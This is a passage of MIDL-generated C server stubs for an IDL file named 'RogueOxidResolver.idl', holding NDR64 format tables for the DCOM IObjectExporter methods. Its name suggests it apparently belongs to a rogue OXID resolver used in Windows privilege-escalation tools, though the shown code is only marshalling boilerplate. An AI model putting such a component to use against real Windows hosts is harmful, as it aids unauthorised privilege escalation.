[alloced_on_stack] [simple_pointer] */ 542 | /* 108 */ 0x6, /* FC_SHORT */ 543 | 0x5c, /* FC_PAD */ 544 | /* 110 */ 545 | 0x11, 0x4, /* FC_RP [alloced_on_stack] */ 546 | /* 112 */ NdrFcShort( 0x2 ), /* Offset= 2 (114) */ 547 | /* 114 */ 548 | 0x15, /* FC_STRUCT */ 549 | 0x1, /* 1 */ 550 | /* 116 */ NdrFcShort( 0x4 ), /* 4 */ 551 | /* 118 */ 0x6, /* FC_SHORT */ 552 | 0x6, /* FC_SHORT */ 553 | /* 120 */ 0x5c, /* FC_PAD */ 554 | 0x5b, /* FC_END */ 555 | 556 | 0x0 557 | } 558 | }; 559 | 560 | static const unsigned short IObjectExporter_FormatStringOffsetTable[] = 561 | { 562 | 0, 563 | 72, 564 | 114, 565 | 192, 566 | 228, 567 | 306 568 | }; 569 | 570 | 571 | static const RPC_DISPATCH_FUNCTION IObjectExporter_table[] = 572 | { 573 | NdrServerCall2, 574 | NdrServerCall2, 575 | NdrServerCall2, 576 | NdrServerCall2, 577 | NdrServerCall2, 578 | NdrServerCall2, 579 | 0 580 | }; 581 | static const RPC_DISPATCH_TABLE IObjectExporter_v0_0_DispatchTable = 582 | { 583 | 6, 584 | (RPC_DISPATCH_FUNCTION*)IObjectExporter_table 585 | }; 586 | 587 | 588 | #endif /* defined(_M_AMD64)*/ 589 | 590 | 591 | 592 | /* this ALWAYS GENERATED file contains the RPC server stubs */ 593 | 594 | 595 | /* File created by MIDL compiler version 8.01.0622 */ 596 | /* at Tue Jan 19 04:14:07 2038 597 | */ 598 | /* Compiler settings for RogueOxidResolver.idl: 599 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 600 | protocol : all , ms_ext, c_ext, robust 601 | error checks: allocation ref bounds_check enum stub_data 602 | VC __declspec() decoration level: 603 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 604 | DECLSPEC_UUID(), MIDL_INTERFACE() 605 | */ 606 | /* @@MIDL_FILE_HEADING( ) */ 607 | 608 | #if defined(_M_AMD64) 609 | 610 | 611 | 612 | 613 | #if !defined(__RPC_WIN64__) 614 | #error Invalid build platform for this stub. 
615 | #endif 616 | 617 | 618 | #include "ndr64types.h" 619 | #include "pshpack8.h" 620 | 621 | 622 | typedef 623 | NDR64_FORMAT_CHAR 624 | __midl_frag64_t; 625 | extern const __midl_frag64_t __midl_frag64; 626 | 627 | typedef 628 | NDR64_FORMAT_CHAR 629 | __midl_frag63_t; 630 | extern const __midl_frag63_t __midl_frag63; 631 | 632 | typedef 633 | struct _NDR64_POINTER_FORMAT 634 | __midl_frag62_t; 635 | extern const __midl_frag62_t __midl_frag62; 636 | 637 | typedef 638 | struct _NDR64_POINTER_FORMAT 639 | __midl_frag61_t; 640 | extern const __midl_frag61_t __midl_frag61; 641 | 642 | typedef 643 | struct _NDR64_POINTER_FORMAT 644 | __midl_frag60_t; 645 | extern const __midl_frag60_t __midl_frag60; 646 | 647 | typedef 648 | struct _NDR64_POINTER_FORMAT 649 | __midl_frag59_t; 650 | extern const __midl_frag59_t __midl_frag59; 651 | 652 | typedef 653 | struct 654 | { 655 | struct _NDR64_PROC_FORMAT frag1; 656 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 657 | struct _NDR64_PARAM_FORMAT frag3; 658 | struct _NDR64_PARAM_FORMAT frag4; 659 | struct _NDR64_PARAM_FORMAT frag5; 660 | struct _NDR64_PARAM_FORMAT frag6; 661 | } 662 | __midl_frag58_t; 663 | extern const __midl_frag58_t __midl_frag58; 664 | 665 | typedef 666 | struct 667 | { 668 | struct _NDR64_STRUCTURE_HEADER_FORMAT frag1; 669 | } 670 | __midl_frag56_t; 671 | extern const __midl_frag56_t __midl_frag56; 672 | 673 | typedef 674 | struct _NDR64_POINTER_FORMAT 675 | __midl_frag52_t; 676 | extern const __midl_frag52_t __midl_frag52; 677 | 678 | typedef 679 | NDR64_FORMAT_CHAR 680 | __midl_frag49_t; 681 | extern const __midl_frag49_t __midl_frag49; 682 | 683 | typedef 684 | struct 685 | { 686 | NDR64_FORMAT_UINT32 frag1; 687 | struct _NDR64_EXPR_VAR frag2; 688 | } 689 | __midl_frag48_t; 690 | extern const __midl_frag48_t __midl_frag48; 691 | 692 | typedef 693 | struct 694 | { 695 | struct _NDR64_CONF_ARRAY_HEADER_FORMAT frag1; 696 | struct _NDR64_ARRAY_ELEMENT_INFO frag2; 697 | } 698 | __midl_frag47_t; 699 | 
extern const __midl_frag47_t __midl_frag47; 700 | 701 | typedef 702 | NDR64_FORMAT_CHAR 703 | __midl_frag45_t; 704 | extern const __midl_frag45_t __midl_frag45; 705 | 706 | typedef 707 | struct _NDR64_POINTER_FORMAT 708 | __midl_frag44_t; 709 | extern const __midl_frag44_t __midl_frag44; 710 | 711 | typedef 712 | struct 713 | { 714 | struct _NDR64_PROC_FORMAT frag1; 715 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 716 | struct _NDR64_PARAM_FORMAT frag3; 717 | struct _NDR64_PARAM_FORMAT frag4; 718 | struct _NDR64_PARAM_FORMAT frag5; 719 | struct _NDR64_PARAM_FORMAT frag6; 720 | struct _NDR64_PARAM_FORMAT frag7; 721 | struct _NDR64_PARAM_FORMAT frag8; 722 | struct _NDR64_PARAM_FORMAT frag9; 723 | struct _NDR64_PARAM_FORMAT frag10; 724 | } 725 | __midl_frag43_t; 726 | extern const __midl_frag43_t __midl_frag43; 727 | 728 | typedef 729 | struct 730 | { 731 | struct _NDR64_PROC_FORMAT frag1; 732 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 733 | struct _NDR64_PARAM_FORMAT frag3; 734 | } 735 | __midl_frag41_t; 736 | extern const __midl_frag41_t __midl_frag41; 737 | 738 | typedef 739 | struct _NDR64_POINTER_FORMAT 740 | __midl_frag38_t; 741 | extern const __midl_frag38_t __midl_frag38; 742 | 743 | typedef 744 | struct 745 | { 746 | NDR64_FORMAT_UINT32 frag1; 747 | struct _NDR64_EXPR_VAR frag2; 748 | } 749 | __midl_frag36_t; 750 | extern const __midl_frag36_t __midl_frag36; 751 | 752 | typedef 753 | struct 754 | { 755 | struct _NDR64_CONF_ARRAY_HEADER_FORMAT frag1; 756 | struct _NDR64_ARRAY_ELEMENT_INFO frag2; 757 | } 758 | __midl_frag35_t; 759 | extern const __midl_frag35_t __midl_frag35; 760 | 761 | typedef 762 | struct _NDR64_POINTER_FORMAT 763 | __midl_frag34_t; 764 | extern const __midl_frag34_t __midl_frag34; 765 | 766 | typedef 767 | struct 768 | { 769 | NDR64_FORMAT_UINT32 frag1; 770 | struct _NDR64_EXPR_VAR frag2; 771 | } 772 | __midl_frag32_t; 773 | extern const __midl_frag32_t __midl_frag32; 774 | 775 | typedef 776 | struct 777 | { 778 | struct 
_NDR64_CONF_ARRAY_HEADER_FORMAT frag1; 779 | struct _NDR64_ARRAY_ELEMENT_INFO frag2; 780 | } 781 | __midl_frag31_t; 782 | extern const __midl_frag31_t __midl_frag31; 783 | 784 | typedef 785 | struct _NDR64_POINTER_FORMAT 786 | __midl_frag30_t; 787 | extern const __midl_frag30_t __midl_frag30; 788 | 789 | typedef 790 | struct 791 | { 792 | struct _NDR64_PROC_FORMAT frag1; 793 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 794 | struct _NDR64_PARAM_FORMAT frag3; 795 | struct _NDR64_PARAM_FORMAT frag4; 796 | struct _NDR64_PARAM_FORMAT frag5; 797 | struct _NDR64_PARAM_FORMAT frag6; 798 | struct _NDR64_PARAM_FORMAT frag7; 799 | struct _NDR64_PARAM_FORMAT frag8; 800 | struct _NDR64_PARAM_FORMAT frag9; 801 | struct _NDR64_PARAM_FORMAT frag10; 802 | } 803 | __midl_frag24_t; 804 | extern const __midl_frag24_t __midl_frag24; 805 | 806 | typedef 807 | struct 808 | { 809 | struct _NDR64_PROC_FORMAT frag1; 810 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 811 | struct _NDR64_PARAM_FORMAT frag3; 812 | struct _NDR64_PARAM_FORMAT frag4; 813 | } 814 | __midl_frag20_t; 815 | extern const __midl_frag20_t __midl_frag20; 816 | 817 | typedef 818 | struct 819 | { 820 | struct _NDR64_STRUCTURE_HEADER_FORMAT frag1; 821 | } 822 | __midl_frag16_t; 823 | extern const __midl_frag16_t __midl_frag16; 824 | 825 | typedef 826 | struct 827 | { 828 | NDR64_FORMAT_UINT32 frag1; 829 | struct _NDR64_EXPR_VAR frag2; 830 | } 831 | __midl_frag13_t; 832 | extern const __midl_frag13_t __midl_frag13; 833 | 834 | typedef 835 | struct 836 | { 837 | struct _NDR64_CONF_ARRAY_HEADER_FORMAT frag1; 838 | struct _NDR64_ARRAY_ELEMENT_INFO frag2; 839 | } 840 | __midl_frag12_t; 841 | extern const __midl_frag12_t __midl_frag12; 842 | 843 | typedef 844 | struct 845 | { 846 | struct _NDR64_CONF_STRUCTURE_HEADER_FORMAT frag1; 847 | } 848 | __midl_frag11_t; 849 | extern const __midl_frag11_t __midl_frag11; 850 | 851 | typedef 852 | struct 853 | { 854 | struct _NDR64_PROC_FORMAT frag1; 855 | struct 
_NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 856 | struct _NDR64_PARAM_FORMAT frag3; 857 | struct _NDR64_PARAM_FORMAT frag4; 858 | struct _NDR64_PARAM_FORMAT frag5; 859 | struct _NDR64_PARAM_FORMAT frag6; 860 | struct _NDR64_PARAM_FORMAT frag7; 861 | struct _NDR64_PARAM_FORMAT frag8; 862 | struct _NDR64_PARAM_FORMAT frag9; 863 | } 864 | __midl_frag2_t; 865 | extern const __midl_frag2_t __midl_frag2; 866 | 867 | typedef 868 | NDR64_FORMAT_UINT32 869 | __midl_frag1_t; 870 | extern const __midl_frag1_t __midl_frag1; 871 | 872 | static const __midl_frag64_t __midl_frag64 = 873 | 0x13 /* FC64_ERROR_STATUS_T */; 874 | 875 | static const __midl_frag63_t __midl_frag63 = 876 | 0x5 /* FC64_INT32 */; 877 | 878 | static const __midl_frag62_t __midl_frag62 = 879 | { 880 | /* *DWORD */ 881 | 0x20, /* FC64_RP */ 882 | (NDR64_UINT8) 12 /* 0xc */, 883 | (NDR64_UINT16) 0 /* 0x0 */, 884 | &__midl_frag63 885 | }; 886 | 887 | static const __midl_frag61_t __midl_frag61 = 888 | { 889 | /* *DUALSTRINGARRAY */ 890 | 0x21, /* FC64_UP */ 891 | (NDR64_UINT8) 0 /* 0x0 */, 892 | (NDR64_UINT16) 0 /* 0x0 */, 893 | &__midl_frag11 894 | }; 895 | 896 | static const __midl_frag60_t __midl_frag60 = 897 | { 898 | /* **DUALSTRINGARRAY */ 899 | 0x20, /* FC64_RP */ 900 | (NDR64_UINT8) 20 /* 0x14 */, 901 | (NDR64_UINT16) 0 /* 0x0 */, 902 | &__midl_frag61 903 | }; 904 | 905 | static const __midl_frag59_t __midl_frag59 = 906 | { 907 | /* *COMVERSION */ 908 | 0x20, /* FC64_RP */ 909 | (NDR64_UINT8) 4 /* 0x4 */, 910 | (NDR64_UINT16) 0 /* 0x0 */, 911 | &__midl_frag56 912 | }; 913 | 914 | static const __midl_frag58_t __midl_frag58 = 915 | { 916 | /* ServerAlive2 */ 917 | { 918 | /* ServerAlive2 */ /* procedure ServerAlive2 */ 919 | (NDR64_UINT32) 21626944 /* 0x14a0040 */, /* explicit handle */ /* IsIntrepreted, ServerMustSize, HasReturn, ClientCorrelation, HasExtensions */ 920 | (NDR64_UINT32) 40 /* 0x28 */ , /* Stack size */ 921 | (NDR64_UINT32) 0 /* 0x0 */, 922 | (NDR64_UINT32) 84 /* 0x54 */, 923 | (NDR64_UINT16) 1 
/* 0x1 */, 924 | (NDR64_UINT16) 0 /* 0x0 */, 925 | (NDR64_UINT16) 4 /* 0x4 */, 926 | (NDR64_UINT16) 8 /* 0x8 */ 927 | }, 928 | { 929 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 930 | { 931 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 932 | 0x72, /* FC64_BIND_PRIMITIVE */ 933 | (NDR64_UINT8) 0 /* 0x0 */, 934 | 0 /* 0x0 */, /* Stack offset */ 935 | (NDR64_UINT8) 0 /* 0x0 */, 936 | (NDR64_UINT8) 0 /* 0x0 */ 937 | }, 938 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 939 | }, 940 | { 941 | /* pComVersion */ /* parameter pComVersion */ 942 | &__midl_frag56, 943 | { 944 | /* pComVersion */ 945 | 0, 946 | 1, 947 | 0, 948 | 0, 949 | 1, 950 | 0, 951 | 0, 952 | 0, 953 | 1, 954 | 0, 955 | 0, 956 | 0, 957 | 0, 958 | (NDR64_UINT16) 0 /* 0x0 */, 959 | 1 960 | }, /* MustFree, [out], SimpleRef, UseCache */ 961 | (NDR64_UINT16) 0 /* 0x0 */, 962 | 8 /* 0x8 */, /* Stack offset */ 963 | }, 964 | { 965 | /* ppdsaOrBindings */ /* parameter ppdsaOrBindings */ 966 | &__midl_frag60, 967 | { 968 | /* ppdsaOrBindings */ 969 | 1, 970 | 1, 971 | 0, 972 | 0, 973 | 1, 974 | 0, 975 | 0, 976 | 0, 977 | 0, 978 | 0, 979 | 0, 980 | 0, 981 | 0, 982 | (NDR64_UINT16) 0 /* 0x0 */, 983 | 1 984 | }, /* MustSize, MustFree, [out], UseCache */ 985 | (NDR64_UINT16) 0 /* 0x0 */, 986 | 16 /* 0x10 */, /* Stack offset */ 987 | }, 988 | { 989 | /* pReserved */ /* parameter pReserved */ 990 | &__midl_frag63, 991 | { 992 | /* pReserved */ 993 | 0, 994 | 0, 995 | 0, 996 | 0, 997 | 1, 998 | 0, 999 | 1, 1000 | 0, 1001 | 1, 1002 | 0, 1003 | 0, 1004 | 0, 1005 | 0, 1006 | (NDR64_UINT16) 0 /* 0x0 */, 1007 | 1 1008 | }, /* [out], Basetype, SimpleRef, UseCache */ 1009 | (NDR64_UINT16) 0 /* 0x0 */, 1010 | 24 /* 0x18 */, /* Stack offset */ 1011 | }, 1012 | { 1013 | /* error_status_t */ /* parameter error_status_t */ 1014 | &__midl_frag64, 1015 | { 1016 | /* error_status_t */ 1017 | 0, 1018 | 0, 1019 | 0, 1020 | 0, 1021 | 1, 1022 | 1, 1023 | 1, 1024 | 1, 1025 | 0, 1026 | 0, 1027 | 0, 1028 | 0, 1029 | 0, 1030 | 
(NDR64_UINT16) 0 /* 0x0 */, 1031 | 0 1032 | }, /* [out], IsReturn, Basetype, ByValue */ 1033 | (NDR64_UINT16) 0 /* 0x0 */, 1034 | 32 /* 0x20 */, /* Stack offset */ 1035 | } 1036 | }; 1037 | 1038 | static const __midl_frag56_t __midl_frag56 = 1039 | { 1040 | /* COMVERSION */ 1041 | { 1042 | /* COMVERSION */ 1043 | 0x30, /* FC64_STRUCT */ 1044 | (NDR64_UINT8) 1 /* 0x1 */, 1045 | { 1046 | /* COMVERSION */ 1047 | 0, 1048 | 0, 1049 | 0, 1050 | 0, 1051 | 0, 1052 | 0, 1053 | 0, 1054 | 0 1055 | }, 1056 | (NDR64_UINT8) 0 /* 0x0 */, 1057 | (NDR64_UINT32) 4 /* 0x4 */ 1058 | } 1059 | }; 1060 | 1061 | static const __midl_frag52_t __midl_frag52 = 1062 | { 1063 | /* *IID */ 1064 | 0x20, /* FC64_RP */ 1065 | (NDR64_UINT8) 4 /* 0x4 */, 1066 | (NDR64_UINT16) 0 /* 0x0 */, 1067 | &__midl_frag16 1068 | }; 1069 | 1070 | static const __midl_frag49_t __midl_frag49 = 1071 | 0x4 /* FC64_INT16 */; 1072 | 1073 | static const __midl_frag48_t __midl_frag48 = 1074 | { 1075 | /* */ 1076 | (NDR64_UINT32) 1 /* 0x1 */, 1077 | { 1078 | /* struct _NDR64_EXPR_VAR */ 1079 | 0x3, /* FC_EXPR_VAR */ 1080 | 0x3, /* FC64_UINT16 */ 1081 | (NDR64_UINT16) 0 /* 0x0 */, 1082 | (NDR64_UINT32) 16 /* 0x10 */ /* Offset */ 1083 | } 1084 | }; 1085 | 1086 | static const __midl_frag47_t __midl_frag47 = 1087 | { 1088 | /* */ 1089 | { 1090 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1091 | 0x41, /* FC64_CONF_ARRAY */ 1092 | (NDR64_UINT8) 1 /* 0x1 */, 1093 | { 1094 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1095 | 0, 1096 | 0, 1097 | 0, 1098 | 0, 1099 | 0, 1100 | 0, 1101 | 0, 1102 | 0 1103 | }, 1104 | (NDR64_UINT8) 0 /* 0x0 */, 1105 | (NDR64_UINT32) 2 /* 0x2 */, 1106 | &__midl_frag48 1107 | }, 1108 | { 1109 | /* struct _NDR64_ARRAY_ELEMENT_INFO */ 1110 | (NDR64_UINT32) 2 /* 0x2 */, 1111 | &__midl_frag49 1112 | } 1113 | }; 1114 | 1115 | static const __midl_frag45_t __midl_frag45 = 1116 | 0x7 /* FC64_INT64 */; 1117 | 1118 | static const __midl_frag44_t __midl_frag44 = 1119 | { 1120 | /* *OXID */ 1121 | 0x20, /* FC64_RP 
*/ 1122 | (NDR64_UINT8) 8 /* 0x8 */, 1123 | (NDR64_UINT16) 0 /* 0x0 */, 1124 | &__midl_frag45 1125 | }; 1126 | 1127 | static const __midl_frag43_t __midl_frag43 = 1128 | { 1129 | /* ResolveOxid2 */ 1130 | { 1131 | /* ResolveOxid2 */ /* procedure ResolveOxid2 */ 1132 | (NDR64_UINT32) 23986240 /* 0x16e0040 */, /* explicit handle */ /* IsIntrepreted, ServerMustSize, ClientMustSize, HasReturn, ServerCorrelation, ClientCorrelation, HasExtensions */ 1133 | (NDR64_UINT32) 72 /* 0x48 */ , /* Stack size */ 1134 | (NDR64_UINT32) 46 /* 0x2e */, 1135 | (NDR64_UINT32) 156 /* 0x9c */, 1136 | (NDR64_UINT16) 1 /* 0x1 */, 1137 | (NDR64_UINT16) 0 /* 0x0 */, 1138 | (NDR64_UINT16) 8 /* 0x8 */, 1139 | (NDR64_UINT16) 8 /* 0x8 */ 1140 | }, 1141 | { 1142 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1143 | { 1144 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1145 | 0x72, /* FC64_BIND_PRIMITIVE */ 1146 | (NDR64_UINT8) 0 /* 0x0 */, 1147 | 0 /* 0x0 */, /* Stack offset */ 1148 | (NDR64_UINT8) 0 /* 0x0 */, 1149 | (NDR64_UINT8) 0 /* 0x0 */ 1150 | }, 1151 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 1152 | }, 1153 | { 1154 | /* pOxid */ /* parameter pOxid */ 1155 | &__midl_frag45, 1156 | { 1157 | /* pOxid */ 1158 | 0, 1159 | 0, 1160 | 0, 1161 | 1, 1162 | 0, 1163 | 0, 1164 | 1, 1165 | 0, 1166 | 1, 1167 | 0, 1168 | 0, 1169 | 0, 1170 | 0, 1171 | (NDR64_UINT16) 0 /* 0x0 */, 1172 | 0 1173 | }, /* [in], Basetype, SimpleRef */ 1174 | (NDR64_UINT16) 0 /* 0x0 */, 1175 | 8 /* 0x8 */, /* Stack offset */ 1176 | }, 1177 | { 1178 | /* cRequestedProtseqs */ /* parameter cRequestedProtseqs */ 1179 | &__midl_frag49, 1180 | { 1181 | /* cRequestedProtseqs */ 1182 | 0, 1183 | 0, 1184 | 0, 1185 | 1, 1186 | 0, 1187 | 0, 1188 | 1, 1189 | 1, 1190 | 0, 1191 | 0, 1192 | 0, 1193 | 0, 1194 | 0, 1195 | (NDR64_UINT16) 0 /* 0x0 */, 1196 | 0 1197 | }, /* [in], Basetype, ByValue */ 1198 | (NDR64_UINT16) 0 /* 0x0 */, 1199 | 16 /* 0x10 */, /* Stack offset */ 1200 | }, 1201 | { 1202 | /* arRequestedProtseqs */ /* parameter 
arRequestedProtseqs */ 1203 | &__midl_frag47, 1204 | { 1205 | /* arRequestedProtseqs */ 1206 | 1, 1207 | 1, 1208 | 0, 1209 | 1, 1210 | 0, 1211 | 0, 1212 | 0, 1213 | 0, 1214 | 0, 1215 | 0, 1216 | 0, 1217 | 0, 1218 | 0, 1219 | (NDR64_UINT16) 0 /* 0x0 */, 1220 | 0 1221 | }, /* MustSize, MustFree, [in] */ 1222 | (NDR64_UINT16) 0 /* 0x0 */, 1223 | 24 /* 0x18 */, /* Stack offset */ 1224 | }, 1225 | { 1226 | /* ppdsaOxidBindings */ /* parameter ppdsaOxidBindings */ 1227 | &__midl_frag60, 1228 | { 1229 | /* ppdsaOxidBindings */ 1230 | 1, 1231 | 1, 1232 | 0, 1233 | 0, 1234 | 1, 1235 | 0, 1236 | 0, 1237 | 0, 1238 | 0, 1239 | 0, 1240 | 0, 1241 | 0, 1242 | 0, 1243 | (NDR64_UINT16) 0 /* 0x0 */, 1244 | 1 1245 | }, /* MustSize, MustFree, [out], UseCache */ 1246 | (NDR64_UINT16) 0 /* 0x0 */, 1247 | 32 /* 0x20 */, /* Stack offset */ 1248 | }, 1249 | { 1250 | /* pipidRemUnknown */ /* parameter pipidRemUnknown */ 1251 | &__midl_frag16, 1252 | { 1253 | /* pipidRemUnknown */ 1254 | 0, 1255 | 1, 1256 | 0, 1257 | 0, 1258 | 1, 1259 | 0, 1260 | 0, 1261 | 0, 1262 | 1, 1263 | 0, 1264 | 0, 1265 | 0, 1266 | 0, 1267 | (NDR64_UINT16) 0 /* 0x0 */, 1268 | 1 1269 | }, /* MustFree, [out], SimpleRef, UseCache */ 1270 | (NDR64_UINT16) 0 /* 0x0 */, 1271 | 40 /* 0x28 */, /* Stack offset */ 1272 | }, 1273 | { 1274 | /* pAuthnHint */ /* parameter pAuthnHint */ 1275 | &__midl_frag63, 1276 | { 1277 | /* pAuthnHint */ 1278 | 0, 1279 | 0, 1280 | 0, 1281 | 0, 1282 | 1, 1283 | 0, 1284 | 1, 1285 | 0, 1286 | 1, 1287 | 0, 1288 | 0, 1289 | 0, 1290 | 0, 1291 | (NDR64_UINT16) 0 /* 0x0 */, 1292 | 1 1293 | }, /* [out], Basetype, SimpleRef, UseCache */ 1294 | (NDR64_UINT16) 0 /* 0x0 */, 1295 | 48 /* 0x30 */, /* Stack offset */ 1296 | }, 1297 | { 1298 | /* pComVersion */ /* parameter pComVersion */ 1299 | &__midl_frag56, 1300 | { 1301 | /* pComVersion */ 1302 | 0, 1303 | 1, 1304 | 0, 1305 | 0, 1306 | 1, 1307 | 0, 1308 | 0, 1309 | 0, 1310 | 1, 1311 | 0, 1312 | 0, 1313 | 0, 1314 | 0, 1315 | (NDR64_UINT16) 0 /* 0x0 */, 1316 
| 1 1317 | }, /* MustFree, [out], SimpleRef, UseCache */ 1318 | (NDR64_UINT16) 0 /* 0x0 */, 1319 | 56 /* 0x38 */, /* Stack offset */ 1320 | }, 1321 | { 1322 | /* error_status_t */ /* parameter error_status_t */ 1323 | &__midl_frag64, 1324 | { 1325 | /* error_status_t */ 1326 | 0, 1327 | 0, 1328 | 0, 1329 | 0, 1330 | 1, 1331 | 1, 1332 | 1, 1333 | 1, 1334 | 0, 1335 | 0, 1336 | 0, 1337 | 0, 1338 | 0, 1339 | (NDR64_UINT16) 0 /* 0x0 */, 1340 | 0 1341 | }, /* [out], IsReturn, Basetype, ByValue */ 1342 | (NDR64_UINT16) 0 /* 0x0 */, 1343 | 64 /* 0x40 */, /* Stack offset */ 1344 | } 1345 | }; 1346 | 1347 | static const __midl_frag41_t __midl_frag41 = 1348 | { 1349 | /* ServerAlive */ 1350 | { 1351 | /* ServerAlive */ /* procedure ServerAlive */ 1352 | (NDR64_UINT32) 17301568 /* 0x1080040 */, /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */ 1353 | (NDR64_UINT32) 16 /* 0x10 */ , /* Stack size */ 1354 | (NDR64_UINT32) 0 /* 0x0 */, 1355 | (NDR64_UINT32) 8 /* 0x8 */, 1356 | (NDR64_UINT16) 1 /* 0x1 */, 1357 | (NDR64_UINT16) 0 /* 0x0 */, 1358 | (NDR64_UINT16) 1 /* 0x1 */, 1359 | (NDR64_UINT16) 8 /* 0x8 */ 1360 | }, 1361 | { 1362 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1363 | { 1364 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1365 | 0x72, /* FC64_BIND_PRIMITIVE */ 1366 | (NDR64_UINT8) 0 /* 0x0 */, 1367 | 0 /* 0x0 */, /* Stack offset */ 1368 | (NDR64_UINT8) 0 /* 0x0 */, 1369 | (NDR64_UINT8) 0 /* 0x0 */ 1370 | }, 1371 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 1372 | }, 1373 | { 1374 | /* error_status_t */ /* parameter error_status_t */ 1375 | &__midl_frag64, 1376 | { 1377 | /* error_status_t */ 1378 | 0, 1379 | 0, 1380 | 0, 1381 | 0, 1382 | 1, 1383 | 1, 1384 | 1, 1385 | 1, 1386 | 0, 1387 | 0, 1388 | 0, 1389 | 0, 1390 | 0, 1391 | (NDR64_UINT16) 0 /* 0x0 */, 1392 | 0 1393 | }, /* [out], IsReturn, Basetype, ByValue */ 1394 | (NDR64_UINT16) 0 /* 0x0 */, 1395 | 8 /* 0x8 */, /* Stack offset */ 1396 | } 1397 | }; 1398 | 1399 | static const 
__midl_frag38_t __midl_frag38 = 1400 | { 1401 | /* *short */ 1402 | 0x20, /* FC64_RP */ 1403 | (NDR64_UINT8) 12 /* 0xc */, 1404 | (NDR64_UINT16) 0 /* 0x0 */, 1405 | &__midl_frag49 1406 | }; 1407 | 1408 | static const __midl_frag36_t __midl_frag36 = 1409 | { 1410 | /* */ 1411 | (NDR64_UINT32) 1 /* 0x1 */, 1412 | { 1413 | /* struct _NDR64_EXPR_VAR */ 1414 | 0x3, /* FC_EXPR_VAR */ 1415 | 0x3, /* FC64_UINT16 */ 1416 | (NDR64_UINT16) 0 /* 0x0 */, 1417 | (NDR64_UINT32) 32 /* 0x20 */ /* Offset */ 1418 | } 1419 | }; 1420 | 1421 | static const __midl_frag35_t __midl_frag35 = 1422 | { 1423 | /* */ 1424 | { 1425 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1426 | 0x41, /* FC64_CONF_ARRAY */ 1427 | (NDR64_UINT8) 7 /* 0x7 */, 1428 | { 1429 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1430 | 0, 1431 | 0, 1432 | 0, 1433 | 0, 1434 | 0, 1435 | 0, 1436 | 0, 1437 | 0 1438 | }, 1439 | (NDR64_UINT8) 0 /* 0x0 */, 1440 | (NDR64_UINT32) 8 /* 0x8 */, 1441 | &__midl_frag36 1442 | }, 1443 | { 1444 | /* struct _NDR64_ARRAY_ELEMENT_INFO */ 1445 | (NDR64_UINT32) 8 /* 0x8 */, 1446 | &__midl_frag45 1447 | } 1448 | }; 1449 | 1450 | static const __midl_frag34_t __midl_frag34 = 1451 | { 1452 | /* struct _NDR64_POINTER_FORMAT */ 1453 | 0x21, /* FC64_UP */ 1454 | (NDR64_UINT8) 0 /* 0x0 */, 1455 | (NDR64_UINT16) 0 /* 0x0 */, 1456 | &__midl_frag35 1457 | }; 1458 | 1459 | static const __midl_frag32_t __midl_frag32 = 1460 | { 1461 | /* */ 1462 | (NDR64_UINT32) 1 /* 0x1 */, 1463 | { 1464 | /* struct _NDR64_EXPR_VAR */ 1465 | 0x3, /* FC_EXPR_VAR */ 1466 | 0x3, /* FC64_UINT16 */ 1467 | (NDR64_UINT16) 0 /* 0x0 */, 1468 | (NDR64_UINT32) 24 /* 0x18 */ /* Offset */ 1469 | } 1470 | }; 1471 | 1472 | static const __midl_frag31_t __midl_frag31 = 1473 | { 1474 | /* */ 1475 | { 1476 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1477 | 0x41, /* FC64_CONF_ARRAY */ 1478 | (NDR64_UINT8) 7 /* 0x7 */, 1479 | { 1480 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1481 | 0, 1482 | 0, 1483 | 0, 1484 | 0, 1485 | 0, 1486 | 
0, 1487 | 0, 1488 | 0 1489 | }, 1490 | (NDR64_UINT8) 0 /* 0x0 */, 1491 | (NDR64_UINT32) 8 /* 0x8 */, 1492 | &__midl_frag32 1493 | }, 1494 | { 1495 | /* struct _NDR64_ARRAY_ELEMENT_INFO */ 1496 | (NDR64_UINT32) 8 /* 0x8 */, 1497 | &__midl_frag45 1498 | } 1499 | }; 1500 | 1501 | static const __midl_frag30_t __midl_frag30 = 1502 | { 1503 | /* struct _NDR64_POINTER_FORMAT */ 1504 | 0x21, /* FC64_UP */ 1505 | (NDR64_UINT8) 0 /* 0x0 */, 1506 | (NDR64_UINT16) 0 /* 0x0 */, 1507 | &__midl_frag31 1508 | }; 1509 | 1510 | static const __midl_frag24_t __midl_frag24 = 1511 | { 1512 | /* ComplexPing */ 1513 | { 1514 | /* ComplexPing */ /* procedure ComplexPing */ 1515 | (NDR64_UINT32) 19660864 /* 0x12c0040 */, /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasReturn, ServerCorrelation, HasExtensions */ 1516 | (NDR64_UINT32) 72 /* 0x48 */ , /* Stack size */ 1517 | (NDR64_UINT32) 58 /* 0x3a */, 1518 | (NDR64_UINT32) 78 /* 0x4e */, 1519 | (NDR64_UINT16) 1 /* 0x1 */, 1520 | (NDR64_UINT16) 0 /* 0x0 */, 1521 | (NDR64_UINT16) 8 /* 0x8 */, 1522 | (NDR64_UINT16) 8 /* 0x8 */ 1523 | }, 1524 | { 1525 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1526 | { 1527 | /* struct 